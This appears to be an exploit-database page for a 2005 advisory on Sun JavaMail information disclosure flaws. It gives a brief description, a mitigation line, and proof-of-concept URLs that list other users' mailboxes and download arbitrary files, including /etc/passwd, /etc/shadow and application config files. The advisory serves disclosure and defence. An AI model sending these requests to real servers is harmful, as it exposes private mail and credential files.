header-logo
Suggest Exploit
vendor:
JavaMail
by:
SecurityFocus
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: JavaMail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Sun JavaMail Multiple Information Disclosure Vulnerabilities

Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The first issue allows a remote attacker to reveal the contents of email attachments of other users. The second issue allows a remote attacker to download and peruse arbitrary files with the privileges of the affected service. A remote attacker may exploit these issues to disclose potentially sensitive information that could be used to aid in further attacks.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13753/info

Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The following issues are reported:

A remote attacker may reveal the contents of email attachments of other users.

A remote attacker may download and peruse arbitrary files with the privileges of the affected service.

A remote attacker may exploit these issues to disclose potentially sensitive information that could be used to aid in further attacks. 

First issue:
http://example.com/mailboxesdir/user2@example.com/
http://example.com/mailboxesdir/user3@example.com/

Second issue:
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
http://example.com/Download?/etc/passwd
http://example.com/Download?/etc/shadow
http://example.com/Download?/etc/group
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog

Navigation

Suggest Exploit

Services By CQR